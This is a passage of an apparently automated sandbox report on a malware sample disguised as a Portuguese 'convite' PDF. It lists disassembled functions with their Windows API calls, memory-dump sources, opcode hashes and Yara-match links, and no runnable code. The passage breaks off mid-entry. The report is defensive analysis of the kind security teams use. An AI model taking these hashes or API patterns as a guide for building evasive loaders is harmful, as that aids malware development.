                        • Instruction Fuzzy Hash: B9014676604388DFDB209E29CC80BDDB7A2BF59350F844126EC1AAA220D370AB00EB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AEA7F, Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtProtectVirtualMemory.NTDLL ref: 020AEA9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: bbdd25a3a83b8e1ae656f8fe94b258b19f68367aedc0cddc2a299141e62ee211
                        • Instruction ID: f65622b3b685e7e7bf07ee97a5158d8e7945e670e8a7eeb936c46d67fed5827c
                        • Opcode Fuzzy Hash: bbdd25a3a83b8e1ae656f8fe94b258b19f68367aedc0cddc2a299141e62ee211
                        • Instruction Fuzzy Hash: 19C080B4104300CDC6007535449D7967FA5EEF1140F965D2DC9C353018C32484D3D707
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040131C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 244COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.338700424.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.338687094.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.338750660.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.338762831.000000000041C000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: #100
                        • String ID: VB5!6&*
                        • API String ID: 1341478452-3593831657
                        • Opcode ID: 3b4e4829201b7c784cc08df685f4a6a43e699ec9165c8af370bf8557beb5f4b3
                        • Instruction ID: 12b917932859a1ae5ef7c3641085cb5895df7fa2904248b6237c29028729f125
                        • Opcode Fuzzy Hash: 3b4e4829201b7c784cc08df685f4a6a43e699ec9165c8af370bf8557beb5f4b3
                        • Instruction Fuzzy Hash: 2371476244E7C04FC7038B7499AA5A57FB4EE0332430A45EBC4C2CE4B3D52D690AD72A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A2969, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE ref: 020A8EA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: f6f3107fed4a95c3491773a738e9b4e47dbf390c094f8fd65296dd95e4ee220c
                        • Instruction ID: 4208dd8afce0425bf1682b1f8adc880d1efbe828e3c6a2ea8e57730d5a9a9909
                        • Opcode Fuzzy Hash: f6f3107fed4a95c3491773a738e9b4e47dbf390c094f8fd65296dd95e4ee220c
                        • Instruction Fuzzy Hash: A0216734808382CFC7465F748415596BFF0EF13B24F4249EED885DB122D3268946CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A0D4C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        • Opcode ID: cd3546ce3b42da6f7594d3d683c6a28d795f094dc06c6a3e55ff06d5fe5bd651
                        • Instruction ID: 517b45fe09abc9e14136f6b4f7357ba7e2c8cf9ecd0d8341cc2b261e59ebe5cc
                        • Opcode Fuzzy Hash: cd3546ce3b42da6f7594d3d683c6a28d795f094dc06c6a3e55ff06d5fe5bd651
                        • Instruction Fuzzy Hash: 8111237160E3898FC722DF78C8712ED7B32AF51300F9445AED48A4F492D622A606D346
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A911B, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,461EDBC4), ref: 020A9292
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 8cf937dd2f26214b3dfb0eb2a777fe308fe53c8ea592ca9a3b0f13dabb14825c
                        • Instruction ID: 2bc7c82e403dd0e08c44b9116b52b77d20b0068ea6938668932cb06630c54a7c
                        • Opcode Fuzzy Hash: 8cf937dd2f26214b3dfb0eb2a777fe308fe53c8ea592ca9a3b0f13dabb14825c
                        • Instruction Fuzzy Hash: 52112370A48309CFDB7CAE74C86A7EE7AA5FF14300F80440EEC8B96214C7314680DB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABAAA, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: a2768d1c23e83bea053a93c62960d17ca7b111ac46bf3e2d7e20c9637d09cea0
                        • Instruction ID: a461f3757050c658fb6a411b77b4a072d331de0795d4a7af3b491e8431c28312
                        • Opcode Fuzzy Hash: a2768d1c23e83bea053a93c62960d17ca7b111ac46bf3e2d7e20c9637d09cea0
                        • Instruction Fuzzy Hash: 5E01B535204344DFDB245F958CA4AEE76A99FB9304F81002BAD09CB304CB708A42DB45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A28AC, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE ref: 020A8EA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: 2d23d6e0a01d1037f264e5c266e117e2d6ef42f78b3dd59adab4fb076d034aab
                        • Instruction ID: e34843bffd872b6b2b685af0c8a4aa7e2599a4e02ea5b471365eb7f292659835
                        • Opcode Fuzzy Hash: 2d23d6e0a01d1037f264e5c266e117e2d6ef42f78b3dd59adab4fb076d034aab
                        • Instruction Fuzzy Hash: 3A01473100C386DFDB686F60C5122EEBB74BF27760F9649AADCC697112C7608A829B51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABADF, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4d3993715a0816d763601fbf46fef17c24dcf55b953f1c7a87a3796443ebb4d1
                        • Instruction ID: a7f868cb7e214d86912ef87689b3aca5652eb6c1078da6b2ef2993d89a0761fb
                        • Opcode Fuzzy Hash: 4d3993715a0816d763601fbf46fef17c24dcf55b953f1c7a87a3796443ebb4d1
                        • Instruction Fuzzy Hash: 90018435204385DFDB245F959DB4AEE76AA9FB5304F92002AED19CB304CB709E42DB45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABB23, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 1c01b5b1cf6c1aedbd84567ee9570af690d39e584df64a0a2fe64db0fcda2393
                        • Instruction ID: 29c90401216f00a7b30d1c84c951159ee5687c534931734e7fe3cd2c074384fd
                        • Opcode Fuzzy Hash: 1c01b5b1cf6c1aedbd84567ee9570af690d39e584df64a0a2fe64db0fcda2393
                        • Instruction Fuzzy Hash: 67F0F432200384DBDB245F859CA4AEE76A69FB5204F51403BA909CB304CF708A42DA45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A28EF, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE ref: 020A8EA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: 17696c3d44b1c92a1e27a53bbb8253a71cc6e8699e53de562bc0c87b7e3f285f
                        • Instruction ID: 80f3ca3000891b5ae7a369f22e9f1159527a98e686dcca5c155804b5aeb28055
                        • Opcode Fuzzy Hash: 17696c3d44b1c92a1e27a53bbb8253a71cc6e8699e53de562bc0c87b7e3f285f
                        • Instruction Fuzzy Hash: 04F02235008346DFD7542F20C1522AABBB0AF27320F924E9DC8C6A6111C76089829B12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A919F, Relevance: 1.5, APIs: 1, Instructions: 35fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,461EDBC4), ref: 020A9292
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: d60d820507a9acc166ae4295fa514750c3133076a0a80e868c0aae9ff0a6638d
                        • Instruction ID: b57a8709e3a3ce8c2f98aff6514a88ee788799773e6cb2bbf6af7a4c4896b839
                        • Opcode Fuzzy Hash: d60d820507a9acc166ae4295fa514750c3133076a0a80e868c0aae9ff0a6638d
                        • Instruction Fuzzy Hash: 3A018F70548245CFDB646E75C95A3EABAE4BF21700F81451E9DC9D6524C7704290CB2B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABBC3, Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f7a3687efff0344e0457bfc3e0ec70541e4892b25469e1e81b2042fb6f58b41c
                        • Instruction ID: 2e32a0e6f608b803eaedc0fd24054ddce5b920398c642917d72bffab2019e8dc
                        • Opcode Fuzzy Hash: f7a3687efff0344e0457bfc3e0ec70541e4892b25469e1e81b2042fb6f58b41c
                        • Instruction Fuzzy Hash: EDE02630200390CBE7053ED46575EEE36038E31648F81402AFD26C9208CF308A43EF8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A0E17, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        • Opcode ID: 806dd3005bf1b1daac7e38d1b61f550a8468b16e07562bb9d19280857f3722b5
                        • Instruction ID: 09f2045d802b6e88f8a832668d584a836967fb1ee4c0d8ed1b046444339520b3
                        • Opcode Fuzzy Hash: 806dd3005bf1b1daac7e38d1b61f550a8468b16e07562bb9d19280857f3722b5
                        • Instruction Fuzzy Hash: 13F0EC7121E3C98FC761DF38D4B03DDBB626F82204B88459BD4499F552D620A615D705
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABC0B, Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 718537962b39a6f3c56bb820235bfd8206e611bf74621645071eccd7aa6caba9
                        • Instruction ID: 064ccb8008803a435abaafff1217224ecf31c00fb27350c19a51d9cb2f59ed0c
                        • Opcode Fuzzy Hash: 718537962b39a6f3c56bb820235bfd8206e611bf74621645071eccd7aa6caba9
                        • Instruction Fuzzy Hash: 59D0A72010436193D6053BD42536EDF36078D31689B8080267D2648108CF308903AFC6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABC43, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 81b0473624760a277bc00b78f90dc280df0d168149c65d6937f751ac8c6dd561
                        • Instruction ID: 66344e8c076a5c250097ad5a25f1ca3c4e6f8bf2045d49c12bdce4bdd1f9b38e
                        • Opcode Fuzzy Hash: 81b0473624760a277bc00b78f90dc280df0d168149c65d6937f751ac8c6dd561
                        • Instruction Fuzzy Hash: 2DD0C934204355DBD6113F9865A6AEE7B129E32A98B819469BC9549508CF304983AF89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABC77, Relevance: 1.5, APIs: 1, Instructions: 13libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,3637B681,?,020A0FF5,07675E32,020AAA65,00000000,020A0416), ref: 020ABCC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 2b7e0c02dacb6c8a95f4d3634500ab5db2c1b5c0b68dbaa0fb1a93c5b7b8a333
                        • Instruction ID: 695cd533b4ea781ec3b913090d741b50551f971a85a23781440beb767cebe206
                        • Opcode Fuzzy Hash: 2b7e0c02dacb6c8a95f4d3634500ab5db2c1b5c0b68dbaa0fb1a93c5b7b8a333
                        • Instruction Fuzzy Hash: 07C012342003559BD7103F9865A19DD7B129E31A94B41D465F89549508CF3049439F8D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 020A99DB, Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 8&8$xS
                        • API String ID: 1029625771-3953144051
                        • Opcode ID: 711112b752b46fc2e5c5e027e6e6de31228d90b8ae2ee22ddcf491c378828b50
                        • Instruction ID: 6007e17e792e536f17cf4f7eb5b223791b2f3ac4540dba399d4a69812b87341b
                        • Opcode Fuzzy Hash: 711112b752b46fc2e5c5e027e6e6de31228d90b8ae2ee22ddcf491c378828b50
                        • Instruction Fuzzy Hash: 77C10F71A44389DFCF74DEA4CD64BEE37A2BF54340F81812ADD4AAB250E3314A44EB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADB37, Relevance: 2.8, Strings: 2, Instructions: 274COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: FE4$`\oJ
                        • API String ID: 2706961497-122960315
                        • Opcode ID: 0596b8f5b70830c5805c9c9a7801749e573d26a8b1388a676771fbc8539126d0
                        • Instruction ID: 9abe8d012fd29c7af629d7c170fe0d077e26b6b7334e96589605808faefa6d42
                        • Opcode Fuzzy Hash: 0596b8f5b70830c5805c9c9a7801749e573d26a8b1388a676771fbc8539126d0
                        • Instruction Fuzzy Hash: 78C1D63150C3C58EDB65CF78C8A8BDA7FE1AF52360F89C29AC8994F296D3748546C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADB6F, Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: FE4$`\oJ
                        • API String ID: 2706961497-122960315
                        • Opcode ID: ff3603b31bfe700f4583053be85119c65e46c81450819cfbc27163550d219e6a
                        • Instruction ID: 99f78e4d49d30fdd6a59ac365fe690ed9f49b79f5a54a3b85669b7d661f7fa76
                        • Opcode Fuzzy Hash: ff3603b31bfe700f4583053be85119c65e46c81450819cfbc27163550d219e6a
                        • Instruction Fuzzy Hash: A4C1D63150C3C58EDB65CF78C8A8BDA7FE1AF52360F89C29AC8994F296D3748546C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADBC7, Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: FE4$`\oJ
                        • API String ID: 2706961497-122960315
                        • Opcode ID: 658cca9ce36a0642b465c0f483928094c5ac590769b82fc9854096f95b001605
                        • Instruction ID: ae1ea00e7c0fca986a8581fa160045481b735eb0404a410ed0d1cbf4372dcd7c
                        • Opcode Fuzzy Hash: 658cca9ce36a0642b465c0f483928094c5ac590769b82fc9854096f95b001605
                        • Instruction Fuzzy Hash: 18C1D23150C3C58EDB66CF78C8A87DA7FE1AF52360F89C2AAC8994F296D3744546C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADBFF, Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: FE4$`\oJ
                        • API String ID: 2706961497-122960315
                        • Opcode ID: 872b5563aa1568241a5185a5b9835cb94f352540214ff399c8434c93b728f9da
                        • Instruction ID: 4b3e6876d54ec7faa87532e0ac27bbbb1100bf970707d70c259724ef8c09828d
                        • Opcode Fuzzy Hash: 872b5563aa1568241a5185a5b9835cb94f352540214ff399c8434c93b728f9da
                        • Instruction Fuzzy Hash: 38C1D23150C3C58EDB66CF78C8A87DA7FE1AF12360F89C2AAC8994F296D3744546C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADCE3, Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: d606e43ed8caef31fe6123e4f50ddbae679bf314eabd534711a8dcedce170458
                        • Instruction ID: 08f61592c26290b7f1c6e26cccc1749aed77799451b96f50f1a19a494302f9b0
                        • Opcode Fuzzy Hash: d606e43ed8caef31fe6123e4f50ddbae679bf314eabd534711a8dcedce170458
                        • Instruction Fuzzy Hash: A0A1B33150C3C58EDB668F78C8A87DA7FE19F52360F99C2AAC8994F297D3348546C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADD17, Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: 05a2e69c62b694683f3bb22c0ffe10049a4d5a37e29e036e8ae6d6775f9be5b3
                        • Instruction ID: e100b456735d7afd53160ac794e2cad814f2d6221699cb00d4621b8a74b00bd8
                        • Opcode Fuzzy Hash: 05a2e69c62b694683f3bb22c0ffe10049a4d5a37e29e036e8ae6d6775f9be5b3
                        • Instruction Fuzzy Hash: 3CA1B23150C3C58EDB668F78C8A87DA7FE19F52360F99C2AAC8994F297D3348546C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADD6F, Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: fdf17c4764863cd5e7c90e31746a7f20873eb528dd2b1054b8c2496c1a791493
                        • Instruction ID: afe26dd58f811e30dce5da29eae9b6f6b658c39fabb1184f539873f62d640063
                        • Opcode Fuzzy Hash: fdf17c4764863cd5e7c90e31746a7f20873eb528dd2b1054b8c2496c1a791493
                        • Instruction Fuzzy Hash: A8A1C4315083C58ADB75DF78C8A87DA7FE1AF52360F99C2AAC8994F297D3348146C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9A53, Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 8&8$xS
                        • API String ID: 1029625771-3953144051
                        • Opcode ID: c1e2a635cc5966927aef0fbfda27ad487c7f7656f1d0e1b88361d82e9a581c0c
                        • Instruction ID: d545367c7fd714984e91a9b4c4f9ecab46d05adf0631e646e43ed60dcab10c44
                        • Opcode Fuzzy Hash: c1e2a635cc5966927aef0fbfda27ad487c7f7656f1d0e1b88361d82e9a581c0c
                        • Instruction Fuzzy Hash: 2E91E172A44399DFDF74CE64CD64BEE37A6BF18340F85412ADD4AAB240E3304A44DB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AA17B, Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8&8$xS
                        • API String ID: 0-3953144051
                        • Opcode ID: 39ea9ddc7648ffffbbe96a92fc0aeb268d213c3f81c8f719ab1d00dbd123823c
                        • Instruction ID: 87302ca80d160760ca5053e5dadca356d6c4f380db62818529b90c9d1d77f12a
                        • Opcode Fuzzy Hash: 39ea9ddc7648ffffbbe96a92fc0aeb268d213c3f81c8f719ab1d00dbd123823c
                        • Instruction Fuzzy Hash: 80812432A44399DFDF748EB4CD64BEE77A1BF14350F86412ADD4AAB250E3304A44DB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADDDB, Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: b78c519c41db0b01bcd08ae52d00348802d04069c1d2af4c0b4894e41e287c49
                        • Instruction ID: 2ca5a2503b35f4213af4e26fd85dc6c89f3c0dfdf97b6cb62debc0661a5b90d8
                        • Opcode Fuzzy Hash: b78c519c41db0b01bcd08ae52d00348802d04069c1d2af4c0b4894e41e287c49
                        • Instruction Fuzzy Hash: F491E5315083C48ADB75DF78C8A87DA7FE1AF52350F99C1AAC89A4F29AD3344542CB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9AD7, Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8&8$xS
                        • API String ID: 0-3953144051
                        • Opcode ID: 589299283a7cc9953be6e7933401dcbb8dd08c2207b431bbaa466a0b95a8ef3b
